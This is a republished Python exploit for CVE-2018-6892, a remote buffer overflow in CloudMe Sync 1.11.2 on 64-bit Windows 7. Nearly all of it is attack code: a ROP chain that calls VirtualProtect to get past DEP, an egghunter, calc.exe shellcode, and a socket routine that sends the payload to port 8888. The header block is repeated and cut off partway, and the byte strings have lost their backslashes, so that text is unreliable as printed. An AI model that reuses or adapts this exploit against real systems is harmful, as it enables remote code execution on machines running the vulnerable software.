CloudMe Sync 1.11.2 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 806

# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)
# Date: 24.01.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage:https://www.cloudme.com/en
# Soft # Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)
# Date: 24.01.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category: Remote
# Contact:https://twitter.com/matteomalvica
# Version: CloudMe Sync 1.11.2
# Tested on: Windows 7 SP1 x64
# CVE-2018-6892
# Ported to WoW64 from https://www.exploit-db.com/exploits/46218

import socket
import struct

def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x61ba8b5e, # POP EAX # RETN [Qt5Gui.dll]
0x690398a8, # ptr to &VirtualProtect() [IAT Qt5Core.dll]
0x61bdd7f5, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
0x68aef542, # XCHG EAX,ESI # RETN [Qt5Core.dll]
0x68bfe66b, # POP EBP # RETN [Qt5Core.dll]
0x68f82223, # & jmp esp [Qt5Core.dll]
0x6d9f7736, # POP EDX # RETN [Qt5Sql.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x6eb47092, # NEG EDX # RETN [libgcc_s_dw2-1.dll]
0x61e870e0, # POP EBX # RETN [Qt5Gui.dll]
0xffffffff, #
0x6204f463, # INC EBX # RETN [Qt5Gui.dll]
0x68f8063c, # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]
0x61ec44ae, # POP EDX # RETN [Qt5Gui.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x6eb47092, # NEG EDX # RETN [libgcc_s_dw2-1.dll]
0x61e2a807, # POP ECX # RETN [Qt5Gui.dll]
0x6eb573c9, # &Writable location [libgcc_s_dw2-1.dll]
0x61e85d66, # POP EDI # RETN [Qt5Gui.dll]
0x6d9e431c, # RETN (ROP NOP) [Qt5Sql.dll]
0x61ba8ce5, # POP EAX # RETN [Qt5Gui.dll]
0x90909090, # nop
0x61b6b8d0, # PUSHAD # RETN [Qt5Gui.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

target="127.0.0.1"
junk="A"*1052
eip = "xfcx57xeax61" # 0x61ea57fc
nops = "x90x90x90x90"

egg64 = ("x66x8cxcbx80xfbx23x75x08x31xdbx53x53x53x53xb3xc0"
"x66x81xcaxffx0fx42x52x80xfbxc0x74x19x6ax02x58xcd"
"x2ex5ax3cx05x74xeaxb8"
"x77x30x30x74" # tag w00t
"x89xd7xafx75xe5xafx75xe2xffxe7x6ax26x58x31xc9x89"
"xe2x64xffx13x5ex5axebxdf")

#Shellcode calc.exe
shellcode = ""
shellcode += "xdbxdexd9x74x24xf4x58x2bxc9xb1x31xbaxef"
shellcode += "xc3xbdx59x83xc0x04x31x50x14x03x50xfbx21"
shellcode += "x48xa5xebx24xb3x56xebx48x3dxb3xdax48x59"
shellcode += "xb7x4cx79x29x95x60xf2x7fx0exf3x76xa8x21"
shellcode += "xb4x3dx8ex0cx45x6dxf2x0fxc5x6cx27xf0xf4"
shellcode += "xbex3axf1x31xa2xb7xa3xeaxa8x6ax54x9fxe5"
shellcode += "xb6xdfxd3xe8xbex3cxa3x0bxeex92xb8x55x30"
shellcode += "x14x6dxeex79x0ex72xcbx30xa5x40xa7xc2x6f"
shellcode += "x99x48x68x4ex16xbbx70x96x90x24x07xeexe3"
shellcode += "xd9x10x35x9ex05x94xaex38xcdx0ex0bxb9x02"
shellcode += "xc8xd8xb5xefx9ex87xd9xeex73xbcxe5x7bx72"
shellcode += "x13x6cx3fx51xb7x35x9bxf8xeex93x4ax04xf0"
shellcode += "x7cx32xa0x7ax90x27xd9x20xfexb6x6fx5fx4c"
shellcode += "xb8x6fx60xe0xd1x5exebx6fxa5x5ex3exd4x59"
shellcode += "x15x63x7cxf2xf0xf1x3dx9fx02x2cx01xa6x80"
shellcode += "xc5xf9x5dx98xafxfcx1ax1ex43x8cx33xcbx63"
shellcode += "x23x33xdex07xa2xa7x82xe9x41x40x20xf6"

payload = junk+ eip + nops * 3 + rop_chain + nops*4 + egg64 + nops*4 + "w00tw00t" + shellcode

try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)
except:
print "Crashed!"